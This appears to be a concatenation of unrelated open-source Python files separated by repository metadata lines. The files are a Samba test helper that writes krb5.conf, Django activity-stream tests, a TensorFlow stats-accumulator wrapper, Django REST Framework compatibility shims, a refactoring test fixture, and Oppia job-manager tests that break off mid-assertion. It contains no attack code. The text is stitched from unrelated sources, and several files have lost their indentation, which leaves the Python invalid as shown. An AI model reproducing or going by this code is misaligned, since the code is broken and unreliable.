:param other_realms_stanza: Optional extra raw text for [realms] section
"""
f.write("""\
#Generated krb5.conf for %(realm)s
[libdefaults]
\tdefault_realm = %(realm)s
\tdns_lookup_realm = false
\tdns_lookup_kdc = false
\tticket_lifetime = 24h
\tforwardable = yes
\tallow_weak_crypto = yes
""" % {"realm": realm})
f.write("\n[realms]\n")
f.write(mk_realms_stanza(realm, dnsname, domain, kdc_ipv4))
if other_realms_stanza:
f.write(other_realms_stanza)
if tlsdir:
f.write("""
[appdefaults]
pkinit_anchors = FILE:%(tlsdir)s/ca.pem
[kdc]
enable-pkinit = true
pkinit_identity = FILE:%(tlsdir)s/kdc.pem,%(tlsdir)s/key.pem
pkinit_anchors = FILE:%(tlsdir)s/ca.pem
""" % {"tlsdir": tlsdir})
def cleanup_child(pid, name, outf=None):
"""Cleanup a child process.
    :param pid: Pid of the child process to be passed to waitpid()
:param name: Name to use when referring to process
:param outf: File-like object to write to (defaults to stderr)
:return: Child pid
"""
if outf is None:
outf = sys.stderr
(childpid, status) = os.waitpid(pid, os.WNOHANG)
if childpid == 0:
pass
elif childpid < 0:
outf.write("%s child process %d isn't here any more.\n" % (name, pid))
return childpid
elif status & 127:
if status & 128:
core_status = 'with'
else:
core_status = 'without'
outf.write("%s child process %d, died with signal %d, %s coredump.\n" % (name, childpid, (status & 127), core_status))
else:
outf.write("%s child process %d exited with value %d.\n" % (name, childpid, status >> 8))
return childpid
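# A rough usage sketch for cleanup_child(), assuming the caller spawned the
# child itself; the 'sleep' command and the name string are illustrative only:
#
#   pid = os.spawnlp(os.P_NOWAIT, "sleep", "sleep", "1")
#   ...
#   cleanup_child(pid, "sleep-helper")  # reports exit status or signal to stderr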
def get_interface(netbiosname):
"""Return interface id for a particular server.
"""
netbiosname = netbiosname.lower()
interfaces = {
"localnt4dc2": 2,
"localnt4member3": 3,
"localshare4": 4,
"localserver5": 5,
"localktest6": 6,
"maptoguest": 7,
# 11-16 used by selftest.pl for client interfaces
"localdc": 21,
"localvampiredc": 22,
"s4member": 23,
"localrpcproxy": 24,
"dc5": 25,
"dc6": 26,
"dc7": 27,
"rodc": 28,
"localadmember": 29,
"addc": 30,
"localsubdc": 31,
"chgdcpass": 32,
}
# update lib/socket_wrapper/socket_wrapper.c
# #define MAX_WRAPPED_INTERFACES 32
# if you wish to have more than 32 interfaces
return interfaces[netbiosname]
| gpl-3.0 | -1,059,297,147,391,001,900 | 25.896774 | 126 | 0.618134 | false |
whatsthehubbub/playpilots | ebi/actstream/tests.py | 2 | 4691 | import unittest
from django.db import models
from django.test.client import Client
from django.contrib.auth.models import User, Group
from django.contrib.comments.models import Comment
from django.contrib.contenttypes.models import ContentType
from django.contrib.sites.models import Site
from actstream.signals import action
from actstream.models import Action, Follow, follow, user_stream, model_stream, actor_stream
from testapp.models import Player
class ActivityTestCase(unittest.TestCase):
def setUp(self):
self.group = Group.objects.get_or_create(name='CoolGroup')[0]
self.user1 = User.objects.get_or_create(username='admin')[0]
self.user1.set_password('admin')
self.user1.is_superuser = self.user1.is_active = self.user1.is_staff = True
self.user1.save()
self.user2 = User.objects.get_or_create(username='Two')[0]
# User1 joins group
self.user1.groups.add(self.group)
action.send(self.user1,verb='joined',target=self.group)
# User1 follows User2
follow(self.user1, self.user2)
# User2 joins group
self.user2.groups.add(self.group)
action.send(self.user2,verb='joined',target=self.group)
# User2 follows group
follow(self.user2, self.group)
# User1 comments on group
action.send(self.user1,verb='commented on',target=self.group)
comment = Comment.objects.get_or_create(
user = self.user1,
content_type = ContentType.objects.get_for_model(self.group),
object_pk = self.group.pk,
comment = 'Sweet Group!',
site = Site.objects.get_current()
)[0]
# Group responds to comment
action.send(self.group,verb='responded to',target=comment)
self.client = Client()
def test_user1(self):
self.assertEqual(map(unicode, actor_stream(self.user1)),
[u'admin commented on CoolGroup 0 minutes ago', u'admin started following Two 0 minutes ago', u'admin joined CoolGroup 0 minutes ago'])
def test_user2(self):
self.assertEqual(map(unicode, actor_stream(self.user2)),
[u'Two started following CoolGroup 0 minutes ago', u'Two joined CoolGroup 0 minutes ago'])
def test_group(self):
self.assertEqual(map(unicode, actor_stream(self.group)),
[u'CoolGroup responded to admin: Sweet Group!... 0 minutes ago'])
def test_stream(self):
self.assertEqual(map(unicode, user_stream(self.user1)),
[u'Two started following CoolGroup 0 minutes ago', u'Two joined CoolGroup 0 minutes ago'])
self.assertEqual(map(unicode, user_stream(self.user2)),
[u'CoolGroup responded to admin: Sweet Group!... 0 minutes ago'])
def test_rss(self):
rss = self.client.get('/feed/').content
self.assert_(rss.startswith('<?xml version="1.0" encoding="utf-8"?>\n<rss xmlns:atom="http://www.w3.org/2005/Atom" version="2.0">'))
self.assert_(rss.find('Activity feed for your followed actors')>-1)
def test_atom(self):
atom = self.client.get('/feed/atom/').content
self.assert_(atom.startswith('<?xml version="1.0" encoding="utf-8"?>\n<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en-us">'))
self.assert_(atom.find('Activity feed for your followed actors')>-1)
def test_zombies(self):
from random import choice, randint
humans = [Player.objects.create() for i in range(10)]
zombies = [Player.objects.create(state=1) for _ in range(2)]
while len(humans):
for z in zombies:
if not len(humans): break
victim = choice(humans)
humans.pop(humans.index(victim))
victim.state = 1
victim.save()
zombies.append(victim)
action.send(z,verb='killed',target=victim)
self.assertEqual(map(unicode,model_stream(Player))[:5],
map(unicode,Action.objects.order_by('-timestamp')[:5]))
def tearDown(self):
from django.core.serializers import serialize
for i,m in enumerate((Comment,ContentType,Player,Follow,Action,User,Group)):
f = open('testdata%d.json'%i,'w')
f.write(serialize('json',m.objects.all()))
f.close()
Action.objects.all().delete()
Comment.objects.all().delete()
Player.objects.all().delete()
User.objects.all().delete()
Group.objects.all().delete()
Follow.objects.all().delete()
| mit | 902,271,589,175,147,500 | 42.036697 | 147 | 0.617566 | false |
ryfeus/lambda-packs | Tensorflow/source/tensorflow/contrib/boosted_trees/python/ops/stats_accumulator_ops.py | 62 | 9211 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Stats Accumulator ops python wrappers."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import re
from tensorflow.contrib.boosted_trees.python.ops import batch_ops_utils
# pylint: disable=unused-import
from tensorflow.contrib.boosted_trees.python.ops import boosted_trees_ops_loader
# pylint: enable=unused-import
from tensorflow.contrib.boosted_trees.python.ops import gen_stats_accumulator_ops
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import resources
from tensorflow.python.training import saver
# Pattern to remove all non alpha numeric from a string.
_PATTERN = re.compile(r"[\W_]+")
class StatsAccumulator(saver.BaseSaverBuilder.SaveableObject):
"""A resource that allows to accumulate gradients and hessians.
For consistency guarantees, we use read and write stamp tokens.
The stamp token on the resource is updated with StatsAccumulator.flush.
Calls to StatsAccumulator.add that don't provide the current stamp token are
ignored.
"""
def __init__(self,
stamp_token,
gradient_shape,
hessian_shape,
name=None,
container=None):
"""Creates a stats accumulator and returns a handle to it.
Args:
stamp_token: An int64, initial value to use for the stamp token.
gradient_shape: A TensorShape, containing shape of gradients.
hessian_shape: A TensorShape, containing shape of hessians.
name: A name for the stats accumulator variable.
container: An optional `string`. Defaults to `""`.
Returns:
A `Tensor` of type mutable `string`. The handle to the stats accumulator.
"""
if name is not None:
name = _PATTERN.sub("", name)
with ops.name_scope(name, "StatsAccumulator") as name:
# Both values are scalars.
if (gradient_shape == tensor_shape.scalar() and
hessian_shape == tensor_shape.scalar()):
self._is_scalar = True
self._resource_handle = (gen_stats_accumulator_ops.
stats_accumulator_scalar_resource_handle_op(
container, name, name=name))
create_op = gen_stats_accumulator_ops.create_stats_accumulator_scalar(
self._resource_handle, stamp_token)
is_initialized_op = (
gen_stats_accumulator_ops.stats_accumulator_scalar_is_initialized(
self._resource_handle))
else:
self._is_scalar = False
self._resource_handle = (gen_stats_accumulator_ops.
stats_accumulator_tensor_resource_handle_op(
container, name, name=name))
create_op = gen_stats_accumulator_ops.create_stats_accumulator_tensor(
self._resource_handle, stamp_token, gradient_shape.as_list(),
hessian_shape.as_list())
is_initialized_op = (
gen_stats_accumulator_ops.stats_accumulator_tensor_is_initialized(
self._resource_handle))
self._create_op = create_op
slice_spec = ""
saver_name = self._resource_handle.name
(stamp_token, num_updates, partition_ids, feature_ids, gradients,
hessians) = self.serialize()
specs = [
saver.BaseSaverBuilder.SaveSpec(stamp_token, slice_spec,
saver_name + "_stamp"),
saver.BaseSaverBuilder.SaveSpec(num_updates, slice_spec,
saver_name + "_num_updates"),
saver.BaseSaverBuilder.SaveSpec(partition_ids, slice_spec,
saver_name + "_partition_ids"),
saver.BaseSaverBuilder.SaveSpec(feature_ids, slice_spec,
saver_name + "_feature_ids"),
saver.BaseSaverBuilder.SaveSpec(gradients, slice_spec,
saver_name + "_gradients"),
saver.BaseSaverBuilder.SaveSpec(hessians, slice_spec,
saver_name + "hessians"),
]
super(StatsAccumulator, self).__init__(self._resource_handle, specs, name)
resources.register_resource(self._resource_handle, create_op,
is_initialized_op)
ops.add_to_collection(ops.GraphKeys.SAVEABLE_OBJECTS, self)
def add(self, stamp_token, partition_ids, feature_ids, gradients, hessians):
"""Updates the stats accumulator."""
partition_ids, feature_ids, gradients, hessians = (self._make_summary(
partition_ids, feature_ids, gradients, hessians))
if self._is_scalar:
return gen_stats_accumulator_ops.stats_accumulator_scalar_add(
[self._resource_handle], stamp_token, [partition_ids], [feature_ids],
[gradients], [hessians])
else:
return gen_stats_accumulator_ops.stats_accumulator_tensor_add(
[self._resource_handle], stamp_token, [partition_ids], [feature_ids],
[gradients], [hessians])
def schedule_add(self, partition_ids, feature_ids, gradients, hessians):
"""Schedules an update to the stats accumulator."""
partition_ids, feature_ids, gradients, hessians = (self._make_summary(
partition_ids, feature_ids, gradients, hessians))
if self._is_scalar:
return batch_ops_utils.ScheduledStampedResourceOp(
op=gen_stats_accumulator_ops.stats_accumulator_scalar_add,
resource_handle=self._resource_handle,
partition_ids=partition_ids,
feature_ids=feature_ids,
gradients=gradients,
hessians=hessians)
else:
return batch_ops_utils.ScheduledStampedResourceOp(
op=gen_stats_accumulator_ops.stats_accumulator_tensor_add,
resource_handle=self._resource_handle,
partition_ids=partition_ids,
feature_ids=feature_ids,
gradients=gradients,
hessians=hessians)
def _make_summary(self, partition_ids, feature_ids, gradients, hessians):
if self._is_scalar:
return gen_stats_accumulator_ops.stats_accumulator_scalar_make_summary(
partition_ids, feature_ids, gradients, hessians)
else:
return gen_stats_accumulator_ops.stats_accumulator_tensor_make_summary(
partition_ids, feature_ids, gradients, hessians)
def deserialize(self, stamp_token, num_updates, partition_ids, feature_ids,
gradients, hessians):
"""Resets the stats accumulator with the serialized state."""
if self._is_scalar:
return gen_stats_accumulator_ops.stats_accumulator_scalar_deserialize(
self._resource_handle, stamp_token, num_updates, partition_ids,
feature_ids, gradients, hessians)
else:
return gen_stats_accumulator_ops.stats_accumulator_tensor_deserialize(
self._resource_handle, stamp_token, num_updates, partition_ids,
feature_ids, gradients, hessians)
def flush(self, stamp_token, next_stamp_token):
"""Flushes the stats accumulator."""
if self._is_scalar:
return gen_stats_accumulator_ops.stats_accumulator_scalar_flush(
self._resource_handle, stamp_token, next_stamp_token)
else:
return gen_stats_accumulator_ops.stats_accumulator_tensor_flush(
self._resource_handle, stamp_token, next_stamp_token)
def serialize(self):
"""Serializes the stats accumulator state."""
if self._is_scalar:
return gen_stats_accumulator_ops.stats_accumulator_scalar_serialize(
self._resource_handle)
else:
return gen_stats_accumulator_ops.stats_accumulator_tensor_serialize(
self._resource_handle)
def restore(self, restored_tensors, unused_restored_shapes):
"""Restores the associated tree ensemble from 'restored_tensors'.
Args:
restored_tensors: the tensors that were loaded from a checkpoint.
unused_restored_shapes: the shapes this object should conform to after
restore. Not meaningful for trees.
Returns:
The operation that restores the state of the tree ensemble variable.
"""
with ops.control_dependencies([self._create_op]):
return self.deserialize(
stamp_token=restored_tensors[0],
num_updates=restored_tensors[1],
partition_ids=restored_tensors[2],
feature_ids=restored_tensors[3],
gradients=restored_tensors[4],
hessians=restored_tensors[5])
def resource(self):
return self._resource_handle
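# A rough sketch of the stamp-token protocol described in the class docstring;
# the partition/feature/gradient tensors are placeholders, not a real pipeline:
#
#   acc = StatsAccumulator(stamp_token=0,
#                          gradient_shape=tensor_shape.scalar(),
#                          hessian_shape=tensor_shape.scalar())
#   add_op = acc.add(0, partition_ids, feature_ids, gradients, hessians)
#   # Adds carrying a stale stamp token are silently ignored by the resource.
#   flush_op = acc.flush(stamp_token=0, next_stamp_token=1)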
| mit | 1,865,877,822,511,427,600 | 43.497585 | 81 | 0.656063 | false |
devs1991/test_edx_docmode | venv/lib/python2.7/site-packages/rest_framework/compat.py | 29 | 7549 | """
The `compat` module provides support for backwards compatibility with older
versions of Django/Python, and compatibility wrappers around optional packages.
"""
# flake8: noqa
from __future__ import unicode_literals
import django
from django.conf import settings
from django.db import connection, transaction
from django.utils import six
from django.views.generic import View
try:
import importlib # Available in Python 3.1+
except ImportError:
from django.utils import importlib # Will be removed in Django 1.9
def unicode_repr(instance):
# Get the repr of an instance, but ensure it is a unicode string
# on both python 3 (already the case) and 2 (not the case).
if six.PY2:
return repr(instance).decode('utf-8')
return repr(instance)
def unicode_to_repr(value):
# Coerce a unicode string to the correct repr return type, depending on
# the Python version. We wrap all our `__repr__` implementations with
# this and then use unicode throughout internally.
if six.PY2:
return value.encode('utf-8')
return value
def unicode_http_header(value):
# Coerce HTTP header value to unicode.
if isinstance(value, six.binary_type):
return value.decode('iso-8859-1')
return value
def total_seconds(timedelta):
# TimeDelta.total_seconds() is only available in Python 2.7
if hasattr(timedelta, 'total_seconds'):
return timedelta.total_seconds()
else:
return (timedelta.days * 86400.0) + float(timedelta.seconds) + (timedelta.microseconds / 1000000.0)
def distinct(queryset, base):
if settings.DATABASES[queryset.db]["ENGINE"] == "django.db.backends.oracle":
# distinct analogue for Oracle users
return base.filter(pk__in=set(queryset.values_list('pk', flat=True)))
return queryset.distinct()
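# Sketch of the intended call pattern (illustrative): callers pass both the
# filtered queryset and the base queryset it was derived from, so the Oracle
# fallback can re-filter the base by primary key instead of using DISTINCT:
#
#   queryset = distinct(queryset.filter(title__icontains=term), base_queryset)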
# OrderedDict only available in Python 2.7.
# This will always be the case in Django 1.7 and above, as these versions
# no longer support Python 2.6.
# For Django <= 1.6 and Python 2.6 fall back to SortedDict.
try:
from collections import OrderedDict
except ImportError:
from django.utils.datastructures import SortedDict as OrderedDict
# contrib.postgres only supported from 1.8 onwards.
try:
from django.contrib.postgres import fields as postgres_fields
except ImportError:
postgres_fields = None
# django-filter is optional
try:
import django_filters
except ImportError:
django_filters = None
if django.VERSION >= (1, 6):
def clean_manytomany_helptext(text):
return text
else:
# Up to version 1.5 many to many fields automatically suffix
# the `help_text` attribute with hardcoded text.
def clean_manytomany_helptext(text):
if text.endswith(' Hold down "Control", or "Command" on a Mac, to select more than one.'):
text = text[:-69]
return text
# Django-guardian is optional. Import only if guardian is in INSTALLED_APPS
# Fixes (#1712). We keep the try/except for the test suite.
guardian = None
try:
import guardian
import guardian.shortcuts # Fixes #1624
except ImportError:
pass
def get_model_name(model_cls):
try:
return model_cls._meta.model_name
except AttributeError:
# < 1.6 used module_name instead of model_name
return model_cls._meta.module_name
# MinValueValidator, MaxValueValidator et al. only accept `message` in 1.8+
if django.VERSION >= (1, 8):
from django.core.validators import MinValueValidator, MaxValueValidator
from django.core.validators import MinLengthValidator, MaxLengthValidator
else:
from django.core.validators import MinValueValidator as DjangoMinValueValidator
from django.core.validators import MaxValueValidator as DjangoMaxValueValidator
from django.core.validators import MinLengthValidator as DjangoMinLengthValidator
from django.core.validators import MaxLengthValidator as DjangoMaxLengthValidator
class MinValueValidator(DjangoMinValueValidator):
def __init__(self, *args, **kwargs):
self.message = kwargs.pop('message', self.message)
super(MinValueValidator, self).__init__(*args, **kwargs)
class MaxValueValidator(DjangoMaxValueValidator):
def __init__(self, *args, **kwargs):
self.message = kwargs.pop('message', self.message)
super(MaxValueValidator, self).__init__(*args, **kwargs)
class MinLengthValidator(DjangoMinLengthValidator):
def __init__(self, *args, **kwargs):
self.message = kwargs.pop('message', self.message)
super(MinLengthValidator, self).__init__(*args, **kwargs)
class MaxLengthValidator(DjangoMaxLengthValidator):
def __init__(self, *args, **kwargs):
self.message = kwargs.pop('message', self.message)
super(MaxLengthValidator, self).__init__(*args, **kwargs)
# URLValidator only accepts `message` in 1.6+
if django.VERSION >= (1, 6):
from django.core.validators import URLValidator
else:
from django.core.validators import URLValidator as DjangoURLValidator
class URLValidator(DjangoURLValidator):
def __init__(self, *args, **kwargs):
self.message = kwargs.pop('message', self.message)
super(URLValidator, self).__init__(*args, **kwargs)
# EmailValidator requires explicit regex prior to 1.6+
if django.VERSION >= (1, 6):
from django.core.validators import EmailValidator
else:
from django.core.validators import EmailValidator as DjangoEmailValidator
from django.core.validators import email_re
class EmailValidator(DjangoEmailValidator):
def __init__(self, *args, **kwargs):
super(EmailValidator, self).__init__(email_re, *args, **kwargs)
# PATCH method is not implemented by Django
if 'patch' not in View.http_method_names:
View.http_method_names = View.http_method_names + ['patch']
# Markdown is optional
try:
import markdown
def apply_markdown(text):
"""
Simple wrapper around :func:`markdown.markdown` to set the base level
of '#' style headers to <h2>.
"""
extensions = ['headerid(level=2)']
safe_mode = False
md = markdown.Markdown(extensions=extensions, safe_mode=safe_mode)
return md.convert(text)
except ImportError:
apply_markdown = None
# `separators` argument to `json.dumps()` differs between 2.x and 3.x
# See: http://bugs.python.org/issue22767
if six.PY3:
SHORT_SEPARATORS = (',', ':')
LONG_SEPARATORS = (', ', ': ')
INDENT_SEPARATORS = (',', ': ')
else:
SHORT_SEPARATORS = (b',', b':')
LONG_SEPARATORS = (b', ', b': ')
INDENT_SEPARATORS = (b',', b': ')
if django.VERSION >= (1, 8):
from django.db.models import DurationField
from django.utils.dateparse import parse_duration
from django.utils.duration import duration_string
else:
DurationField = duration_string = parse_duration = None
def set_rollback():
if hasattr(transaction, 'set_rollback'):
if connection.settings_dict.get('ATOMIC_REQUESTS', False):
# If running in >=1.6 then mark a rollback as required,
# and allow it to be handled by Django.
if connection.in_atomic_block:
transaction.set_rollback(True)
elif transaction.is_managed():
# Otherwise handle it explicitly if in managed mode.
if transaction.is_dirty():
transaction.rollback()
transaction.leave_transaction_management()
else:
# transaction not managed
pass
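# A hedged sketch of a typical call site: an exception handler marks the
# transaction for rollback before returning an error response, so a view
# running under ATOMIC_REQUESTS does not commit partial work. The handler
# name and Response usage below are illustrative:
#
#   def custom_exception_handler(exc, context):
#       ...
#       set_rollback()
#       return Response({'detail': str(exc)}, status=500)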
| agpl-3.0 | 2,562,711,023,433,366,000 | 31.821739 | 107 | 0.686581 | false |
MichaelNedzelsky/intellij-community | python/testData/refactoring/pullup/pyPullUpInfoModel.py | 80 | 1827 | class EmptyParent:pass
class SomeParent:
PARENT_CLASS_FIELD = 42
def __init__(self):
self.parent_instance_field = "egg"
def parent_func(self):
pass
class ChildWithDependencies(SomeParent, EmptyParent):
CLASS_FIELD_FOO = 42
CLASS_FIELD_DEPENDS_ON_CLASS_FIELD_FOO = CLASS_FIELD_FOO
CLASS_FIELD_DEPENDS_ON_PARENT_FIELD = SomeParent.PARENT_CLASS_FIELD
def __init__(self):
SomeParent.__init__(self)
self.instance_field_bar = 42
self.depends_on_instance_field_bar = self.instance_field_bar
self.depends_on_class_field_foo = ChildWithDependencies.CLASS_FIELD_FOO
@property
def new_property(self):
return 1
def _set_prop(self, val):
pass
def _get_prop(self):
return 1
def _del_prop(self):
pass
old_property = property(fset=_set_prop)
old_property_2 = property(fget=_get_prop)
old_property_3 = property(fdel=_del_prop)
@property
def new_property(self):
return 1
@new_property.setter
def new_property(self, val):
pass
@property
def new_property_2(self):
return 1
def normal_method(self):
pass
def method_depends_on_parent_method(self):
self.parent_func()
pass
def method_depends_on_parent_field(self):
i = self.parent_instance_field
pass
def method_depends_on_normal_method(self):
self.normal_method()
def method_depends_on_instance_field_bar(self):
eggs = self.instance_field_bar
def method_depends_on_old_property(self):
i = 12
self.old_property = i
q = self.old_property_2
del self.old_property_3
def method_depends_on_new_property(self):
self.new_property = 12
print(self.new_property_2)
| apache-2.0 | -5,834,207,651,409,390,000 | 21.280488 | 79 | 0.621237 | false |
MaximLich/oppia | core/jobs_test.py | 13 | 34314 | # coding: utf-8
#
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for long running jobs and continuous computations."""
import ast
from core import jobs
from core import jobs_registry
from core.domain import event_services
from core.domain import exp_domain
from core.domain import exp_services
from core.platform import models
from core.tests import test_utils
import feconf
from google.appengine.ext import ndb
(base_models, exp_models, stats_models) = models.Registry.import_models([
models.NAMES.base_model, models.NAMES.exploration, models.NAMES.statistics])
taskqueue_services = models.Registry.import_taskqueue_services()
transaction_services = models.Registry.import_transaction_services()
JOB_FAILED_MESSAGE = 'failed (as expected)'
class DummyJobManager(jobs.BaseDeferredJobManager):
@classmethod
def _run(cls, additional_job_params):
return 'output'
class AnotherDummyJobManager(jobs.BaseDeferredJobManager):
@classmethod
def _run(cls, additional_job_params):
return 'output'
class DummyJobManagerWithParams(jobs.BaseDeferredJobManager):
@classmethod
def _run(cls, additional_job_params):
return additional_job_params['correct']
class DummyFailingJobManager(jobs.BaseDeferredJobManager):
@classmethod
def _run(cls, additional_job_params):
raise Exception(JOB_FAILED_MESSAGE)
class JobWithNoRunMethodManager(jobs.BaseDeferredJobManager):
pass
class JobManagerUnitTests(test_utils.GenericTestBase):
"""Test basic job manager operations."""
def test_create_new(self):
"""Test the creation of a new job."""
job_id = DummyJobManager.create_new()
self.assertTrue(job_id.startswith('DummyJob'))
self.assertEqual(
DummyJobManager.get_status_code(job_id), jobs.STATUS_CODE_NEW)
self.assertIsNone(DummyJobManager.get_time_queued_msec(job_id))
self.assertIsNone(DummyJobManager.get_time_started_msec(job_id))
self.assertIsNone(DummyJobManager.get_time_finished_msec(job_id))
self.assertIsNone(DummyJobManager.get_metadata(job_id))
self.assertIsNone(DummyJobManager.get_output(job_id))
self.assertIsNone(DummyJobManager.get_error(job_id))
self.assertFalse(DummyJobManager.is_active(job_id))
self.assertFalse(DummyJobManager.has_finished(job_id))
def test_enqueue_job(self):
"""Test the enqueueing of a job."""
job_id = DummyJobManager.create_new()
DummyJobManager.enqueue(job_id)
self.assertEqual(self.count_jobs_in_taskqueue(), 1)
self.assertEqual(
DummyJobManager.get_status_code(job_id), jobs.STATUS_CODE_QUEUED)
self.assertIsNotNone(DummyJobManager.get_time_queued_msec(job_id))
self.assertIsNone(DummyJobManager.get_output(job_id))
def test_failure_for_job_enqueued_using_wrong_manager(self):
job_id = DummyJobManager.create_new()
with self.assertRaisesRegexp(Exception, 'Invalid job type'):
AnotherDummyJobManager.enqueue(job_id)
def test_failure_for_job_with_no_run_method(self):
job_id = JobWithNoRunMethodManager.create_new()
JobWithNoRunMethodManager.enqueue(job_id)
self.assertEqual(self.count_jobs_in_taskqueue(), 1)
with self.assertRaisesRegexp(Exception, 'NotImplementedError'):
self.process_and_flush_pending_tasks()
def test_complete_job(self):
job_id = DummyJobManager.create_new()
DummyJobManager.enqueue(job_id)
self.assertEqual(self.count_jobs_in_taskqueue(), 1)
self.process_and_flush_pending_tasks()
self.assertEqual(
DummyJobManager.get_status_code(job_id),
jobs.STATUS_CODE_COMPLETED)
time_queued_msec = DummyJobManager.get_time_queued_msec(job_id)
time_started_msec = DummyJobManager.get_time_started_msec(job_id)
time_finished_msec = DummyJobManager.get_time_finished_msec(job_id)
self.assertIsNotNone(time_queued_msec)
self.assertIsNotNone(time_started_msec)
self.assertIsNotNone(time_finished_msec)
self.assertLess(time_queued_msec, time_started_msec)
self.assertLess(time_started_msec, time_finished_msec)
metadata = DummyJobManager.get_metadata(job_id)
output = DummyJobManager.get_output(job_id)
error = DummyJobManager.get_error(job_id)
self.assertIsNone(metadata)
self.assertEqual(output, 'output')
self.assertIsNone(error)
self.assertFalse(DummyJobManager.is_active(job_id))
self.assertTrue(DummyJobManager.has_finished(job_id))
def test_deferred_job_with_additional_params(self):
"""Test the enqueueing of a job with additional parameters."""
job_id_1 = DummyJobManagerWithParams.create_new()
DummyJobManagerWithParams.enqueue(
job_id_1, additional_job_params={'random': 3, 'correct': 60})
job_id_2 = DummyJobManagerWithParams.create_new()
DummyJobManagerWithParams.enqueue(
job_id_2, additional_job_params={'random': 20, 'correct': 25})
self.assertEqual(self.count_jobs_in_taskqueue(), 2)
self.process_and_flush_pending_tasks()
self.assertTrue(DummyJobManagerWithParams.has_finished(job_id_1))
self.assertEqual(DummyJobManagerWithParams.get_output(job_id_1), 60)
self.assertTrue(DummyJobManagerWithParams.has_finished(job_id_2))
self.assertEqual(DummyJobManagerWithParams.get_output(job_id_2), 25)
def test_job_failure(self):
job_id = DummyFailingJobManager.create_new()
DummyFailingJobManager.enqueue(job_id)
self.assertEqual(self.count_jobs_in_taskqueue(), 1)
with self.assertRaisesRegexp(Exception, 'Task failed'):
self.process_and_flush_pending_tasks()
self.assertEqual(
DummyFailingJobManager.get_status_code(job_id),
jobs.STATUS_CODE_FAILED)
time_queued_msec = DummyFailingJobManager.get_time_queued_msec(job_id)
time_started_msec = DummyFailingJobManager.get_time_started_msec(
job_id)
time_finished_msec = DummyFailingJobManager.get_time_finished_msec(
job_id)
self.assertIsNotNone(time_queued_msec)
self.assertIsNotNone(time_started_msec)
self.assertIsNotNone(time_finished_msec)
self.assertLess(time_queued_msec, time_started_msec)
self.assertLess(time_started_msec, time_finished_msec)
metadata = DummyFailingJobManager.get_metadata(job_id)
output = DummyFailingJobManager.get_output(job_id)
error = DummyFailingJobManager.get_error(job_id)
self.assertIsNone(metadata)
self.assertIsNone(output)
self.assertIn(JOB_FAILED_MESSAGE, error)
self.assertFalse(DummyFailingJobManager.is_active(job_id))
self.assertTrue(DummyFailingJobManager.has_finished(job_id))
def test_status_code_transitions(self):
"""Test that invalid status code transitions are caught."""
job_id = DummyJobManager.create_new()
DummyJobManager.enqueue(job_id)
DummyJobManager.register_start(job_id)
DummyJobManager.register_completion(job_id, 'output')
with self.assertRaisesRegexp(Exception, 'Invalid status code change'):
DummyJobManager.enqueue(job_id)
with self.assertRaisesRegexp(Exception, 'Invalid status code change'):
DummyJobManager.register_completion(job_id, 'output')
with self.assertRaisesRegexp(Exception, 'Invalid status code change'):
DummyJobManager.register_failure(job_id, 'error')
def test_different_jobs_are_independent(self):
job_id = DummyJobManager.create_new()
another_job_id = AnotherDummyJobManager.create_new()
DummyJobManager.enqueue(job_id)
DummyJobManager.register_start(job_id)
AnotherDummyJobManager.enqueue(another_job_id)
self.assertEqual(
DummyJobManager.get_status_code(job_id), jobs.STATUS_CODE_STARTED)
self.assertEqual(
AnotherDummyJobManager.get_status_code(another_job_id),
jobs.STATUS_CODE_QUEUED)
def test_cannot_instantiate_jobs_from_abstract_base_classes(self):
with self.assertRaisesRegexp(
Exception, 'directly create a job using the abstract base'
):
jobs.BaseJobManager.create_new()
def test_cannot_enqueue_same_job_twice(self):
job_id = DummyJobManager.create_new()
DummyJobManager.enqueue(job_id)
with self.assertRaisesRegexp(Exception, 'Invalid status code change'):
DummyJobManager.enqueue(job_id)
def test_can_enqueue_two_instances_of_the_same_job(self):
job_id = DummyJobManager.create_new()
DummyJobManager.enqueue(job_id)
job_id_2 = DummyJobManager.create_new()
DummyJobManager.enqueue(job_id_2)
def test_cancel_kills_queued_job(self):
job_id = DummyJobManager.create_new()
DummyJobManager.enqueue(job_id)
self.assertTrue(DummyJobManager.is_active(job_id))
DummyJobManager.cancel(job_id, 'admin_user_id')
self.assertFalse(DummyJobManager.is_active(job_id))
self.assertEquals(
DummyJobManager.get_status_code(job_id), jobs.STATUS_CODE_CANCELED)
self.assertIsNone(DummyJobManager.get_output(job_id))
self.assertEquals(
DummyJobManager.get_error(job_id), 'Canceled by admin_user_id')
def test_cancel_kills_started_job(self):
job_id = DummyJobManager.create_new()
DummyJobManager.enqueue(job_id)
self.assertTrue(DummyJobManager.is_active(job_id))
DummyJobManager.register_start(job_id)
# Cancel the job immediately after it has started.
DummyJobManager.cancel(job_id, 'admin_user_id')
# The job then finishes.
with self.assertRaisesRegexp(Exception, 'Invalid status code change'):
DummyJobManager.register_completion(job_id, 'job_output')
self.assertFalse(DummyJobManager.is_active(job_id))
self.assertEquals(
DummyJobManager.get_status_code(job_id), jobs.STATUS_CODE_CANCELED)
# Note that no results are recorded for this job.
self.assertIsNone(DummyJobManager.get_output(job_id))
self.assertEquals(
DummyJobManager.get_error(job_id), 'Canceled by admin_user_id')
def test_cancel_does_not_kill_completed_job(self):
job_id = DummyJobManager.create_new()
DummyJobManager.enqueue(job_id)
self.assertTrue(DummyJobManager.is_active(job_id))
# Complete the job.
self.process_and_flush_pending_tasks()
self.assertFalse(DummyJobManager.is_active(job_id))
self.assertEquals(
DummyJobManager.get_status_code(job_id),
